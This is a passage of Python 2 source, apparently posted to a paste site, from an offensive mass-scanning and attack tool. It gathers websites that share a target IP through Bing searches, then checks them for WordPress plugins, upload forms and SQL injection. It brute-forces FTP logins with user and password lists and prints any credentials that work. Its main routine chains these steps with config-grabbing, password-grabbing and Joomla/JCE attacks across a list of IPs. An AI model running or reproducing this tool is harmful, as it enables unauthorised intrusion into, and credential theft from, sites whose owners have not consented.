  854. print bcolors.OKBLUE + "|- Scanning Wordpress From most Known plugins"
  855. for wp in wplist :
  856. for link,name in wpt.iteritems() :
  857. currentcodetwo = urllib.urlopen(wp + "/" + str(link)).getcode()
  858. if currentcodetwo == 200 :
  859. print bcolors.FAIL + "|-> Found Wordpress Plugin " + bcolors.OKGREEN + str(name) + bcolors.FAIL + " In " + bcolors.OKGREEN + str(wp)
  860. #-------------------------------------------------
  861. def bing_check(ip):
  862. page = 1
  863. lista = []
  864. while page <= 101:
  865. try:
  866. bing = "http://www.bing.com/search?q=ip%3A" + ip + "+*.php&count=50&first=" + str(page)
  867. openbing = urllib2.urlopen(bing)
  868. readbing = openbing.read()
  869. findwebs = re.findall('<h2><a href="(.*?)"', readbing)
  870. for i in range(len(findwebs)):
  871. x = findwebs[i]
  872. urls.append(x)
  873. except:
  874. pass
  875.  
  876. page += 50
  877. def scanuplcheck() :
  878. print bcolors.OKBLUE + "|- Ready To check Upload From Crawled Urls"
  879. try :
  880. for url in unique(urls) :
  881. aa =urllib2.urlopen(url).read()
  882. bb = re.findall('type="file"',aa)
  883. if bb :
  884. print bcolors.FAIL + "|-> Upload From Crawl > " + url
  885. except :
  886. pass
  887. def scansqlicheck() :
  888. print bcolors.OKBLUE + "|- Ready To check sqli From Crawled Urls"
  889. try :
  890. for url in unique(urls) :
  891. aa =urllib2.urlopen(url + "'").read()
  892. bb = re.findall('SQL',aa)
  893. if bb :
  894. print bcolors.FAIL + "|-> sql Injection From Crawl > " + url
  895. except :
  896. pass
  897. def bruteftp(ip,user,password):
  898. try:
  899. ftp = FTP(ip)
  900. ftp.login(user, password)
  901. print (bcolors.OKGREEN + '|-> FTP Attacked with username ' + str(user) + ' And password is ' + str(password))
  902. ftp.quit()
  903. except:
  904. pass
  905. def attackftp(ip) :
  906. try :
  907. print bcolors.OKBLUE + "|- Brute Forcing Ftp "
  908. for user in cpusers :
  909. for password in passwords :
  910. bruteftp(ip,user,password)
  911. except :
  912. pass
  913. #~~~~~~~~~~~~~
  914. def main(ip):
  915. del cpusers[:]
  916. del jolist[:]
  917. del wplist[:]
  918. del adlist[:]
  919. del sqlilist[:]
  920. del upllist[:]
  921. del sites[:]
  922. del jcelist[:]
  923. del urls[:]
  924. del wpconfigbak[:]
  925. ip = socket.gethostbyname(ip)
  926. print bcolors.WARNING + "|-> Target : " + str(ip)
  927. extractserver(ip)
  928. grabwp(ip)
  929. grabjo(ip)
  930. grabins(ip)
  931. admingrabber(ip)
  932. grabadfs()
  933. counta()
  934. grabsqli(ip)
  935. count()
  936. grabupl(ip)
  937. grabuploadedlink()
  938. brutea()
  939. grabcpu(ip)
  940. extractcpu()
  941. extractcpul()
  942. grabfour(ip)
  943. graboc(ip)
  944. if attackfio == True :
  945. attackfi()
  946. grabconfigwp()
  947. grabpasswords()
  948. startjce()
  949. com_mediascan()
  950. scanjoomla()
  951. attackftp(ip)
  952. #~~~~~~~~~~~~~
  953. for ip in ips :
  954. ip = ip.rstrip()
  955. main(ip)
  956. #~~~~~~~~~~~~~
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement